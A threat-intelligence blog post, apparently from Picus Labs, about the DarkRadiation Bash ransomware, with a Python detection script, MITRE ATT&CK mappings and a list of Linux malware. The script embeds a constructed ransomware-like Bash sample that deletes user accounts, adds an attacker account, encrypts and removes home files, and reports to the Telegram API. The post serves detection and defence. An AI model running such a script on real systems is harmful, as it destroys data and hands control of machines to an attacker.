Although most malware is written for Windows, a substantial amount targets Unix-like operating systems such as macOS and the Linux distributions. One such family, DarkRadiation, is a Bash-based ransomware that targets Red Hat- and Debian-based Linux distributions [1] as well as Docker cloud containers [2].
The malware is built from a collection of Bash scripts and communicates with Telegram bots through hardcoded API keys, using at least half a dozen command-and-control (C2) endpoints. The scripts depend on wget, curl, sshpass, pssh, and openssl; if any of these is missing on the infected host, the ransomware installs it with YUM, the Python-based package manager of Red Hat-derived distributions.
The ransomware can delete every user account on the infected system and create a separate account for the attacker. For file encryption it shells out to OpenSSL's AES implementation, encrypting either specific files or every file under a given directory, which is why openssl is among its required tools.
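As an added example (not Picus or DarkRadiation code), the following Python script does a static triage of a shell script for the four behaviours described in the two paragraphs above: Telegram Bot API use with a hardcoded token, a tool-presence probe followed by a yum install, mass userdel plus a fresh useradd, and openssl enc with an AES cipher. The two embedded sample scripts are constructed for illustration (the Telegram token is fake and nothing in them is executed), and the regexes, token shape and scoring thresholds are assumptions for the example, not Picus detection logic.

```python
import re
from typing import Dict, List

# Constructed sample that mimics the behaviours the text attributes to DarkRadiation.
# It is NOT the real malware; the bot token is fake. It is only scanned, never run.
SAMPLE_MALICIOUS = r"""#!/bin/bash
BOT="123456789:AAFfakeTokenForIllustrationOnly_000"
CHAT="987654"
for t in wget curl sshpass pssh openssl; do
  command -v "$t" >/dev/null 2>&1 || yum -y install "$t"
done
for u in $(awk -F: '$3>=1000{print $1}' /etc/passwd); do userdel -r "$u"; done
useradd -m attacker && echo 'attacker:pass' | chpasswd
for f in /home/*/*; do
  openssl enc -aes-256-cbc -salt -in "$f" -out "$f.enc" -pass pass:"$KEY" && rm -f "$f"
done
curl -s "https://api.telegram.org/bot${BOT}/sendMessage?chat_id=${CHAT}&text=done"
"""

# Constructed benign backup script that shares openssl and curl with the sample
# above, to show that those tools alone do not trigger a verdict.
SAMPLE_BENIGN = r"""#!/bin/bash
tar czf /tmp/etc.tgz /etc
openssl enc -aes-256-cbc -pbkdf2 -in /tmp/etc.tgz -out /backup/etc.tgz.enc -pass file:/root/.backup_key
curl -sf -T /backup/etc.tgz.enc https://backup.example.internal/upload
"""

# Tools the text names as DarkRadiation dependencies.
DEPENDENCIES = ("wget", "curl", "sshpass", "pssh", "openssl")

# Assumed token shape: numeric bot id, colon, long alphanumeric secret.
TELEGRAM_TOKEN = re.compile(r"\b(\d{8,10}):([A-Za-z0-9_-]{30,})\b")
TELEGRAM_API = re.compile(r"api\.telegram\.org/bot")
TOOL_PROBE = re.compile(r"\b(?:command\s+-v|which|type\s+-P)\b")
YUM_INSTALL = re.compile(r"\byum\b[^\n]*\binstall\b")
USERDEL = re.compile(r"\buserdel\b")
USERADD = re.compile(r"\buseradd\b")
OPENSSL_AES = re.compile(r"\bopenssl\s+enc\b[^\n]*?-(aes-\d{3}-[a-z0-9]+)")


def telegram_tokens(script: str) -> List[str]:
    """Hardcoded bot tokens found in the script, with the secret part masked."""
    return [f"{bot_id}:{secret[:4]}...{secret[-3:]}"
            for bot_id, secret in TELEGRAM_TOKEN.findall(script)]


def installs_missing_tools(script: str, window: int = 3) -> bool:
    """True if a tool-presence probe is followed within `window` lines by a yum install."""
    lines = script.splitlines()
    for i, line in enumerate(lines):
        if TOOL_PROBE.search(line) and any(
                YUM_INSTALL.search(later) for later in lines[i:i + window + 1]):
            return True
    return False


def mentioned_dependencies(script: str) -> List[str]:
    """Which of the named DarkRadiation dependencies the script refers to."""
    return [t for t in DEPENDENCIES if re.search(rf"\b{t}\b", script)]


def account_takeover(script: str) -> Dict[str, int]:
    """Counts of userdel and useradd invocations; both together mean a swap of accounts."""
    return {"userdel": len(USERDEL.findall(script)), "useradd": len(USERADD.findall(script))}


def aes_ciphers(script: str) -> List[str]:
    """AES cipher names passed to `openssl enc`."""
    return OPENSSL_AES.findall(script)


def triage(script: str) -> Dict[str, object]:
    """Combine the four behaviour checks into findings plus a coarse verdict."""
    tokens = telegram_tokens(script)
    accounts = account_takeover(script)
    findings: Dict[str, object] = {
        "telegram_c2": bool(TELEGRAM_API.search(script)) or bool(tokens),
        "hardcoded_tokens": tokens,
        "installs_missing_tools": installs_missing_tools(script),
        "dependencies": mentioned_dependencies(script),
        "account_takeover": accounts["userdel"] > 0 and accounts["useradd"] > 0,
        "openssl_aes_encryption": aes_ciphers(script),
    }
    score = sum([bool(findings["telegram_c2"]), bool(findings["installs_missing_tools"]),
                 bool(findings["account_takeover"]), bool(findings["openssl_aes_encryption"])])
    findings["score"] = score
    # Thresholds are an assumption for the example: three or more behaviours together
    # look like the ransomware; one (e.g. openssl alone) is ordinary administration.
    findings["verdict"] = ("darkradiation-like" if score >= 3
                           else "review" if score == 2 else "benign")
    return findings


if __name__ == "__main__":
    for name, sample in (("malicious", SAMPLE_MALICIOUS), ("benign", SAMPLE_BENIGN)):
        print(name, triage(sample))
```

The point of scoring across behaviours rather than alerting on any single command is visible in the benign sample: it uses `openssl enc -aes-256-cbc` and `curl` just like the ransomware, but without the Telegram token, the yum self-installation and the account swap it stays at a score of one.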
Picus Labs has updated the Picus Threat Library with new attack methods for malware samples used by the DarkRadiation ransomware.
Picus ID | Threat Name
671716 | DarkRadiation Ransomware .SH File Download Variant-1
699113 | DarkRadiation Ransomware .SH File Download Variant-2
MITRE ATT&CK Techniques used by DarkRadiation
Execution
- T1059.004 Command and Scripting Interpreter: Unix Shell
Privilege Escalation
- T1548 Abuse Elevation Control Mechanism
- T1543.002 Create or Modify System Process: Systemd Service
Defense Evasion
- T1027 Obfuscated Files or Information
- T1202 Indirect Command Execution
- T1014 Rootkit
- T1548 Abuse Elevation Control Mechanism
Discovery
- T1082 System Information Discovery
- T1083 File and Directory Discovery (System Object Enumeration)
Persistence
- T1543.002 Create or Modify System Process: Systemd Service
Impact
- T1486 Data Encrypted for Impact
Other Linux Malware in Picus Threat Library
The Picus Threat Library consists of 364 threats for Linux distributions, including Skidmap, TeamTNT, Rocke, Blackrota, Xanthe, Lucifer, FritzFrog, Kinsing, Bigviktor, Tor2Mine, Kingminer, Sandworm, Kaiji, Asnarok, LeetHozer, APT41, AESDDoS, Silex, Monero, HiddenWasp, Outlaw, Mirai, Korkerds, SpeakUp, Hakai, ChinaZ, Butter, SSHDoor, Miori, Torii, Gafgyt, Prowli, HNS, Wicked, OMG, JenX, VPNFilter, DDG, GoScanSSH, Owari, AES IoT Botnet, IOTroop, Hajime, PNScan, GoARM.Bot, KillFile, Mumblehard, Persirai, SHELLBIND, Hide N Seek, kworker, Ruby Cryptominer, XOR.DDoS, Moose, EternalMiner, Monero Miner, Erebus, Turla, Yangji, Tsunami, and Snakso.
References
[2] https://www.sentinelone.com/blog/darkradiation-abusing-bash-for-linux-and-docker-container-ransomware/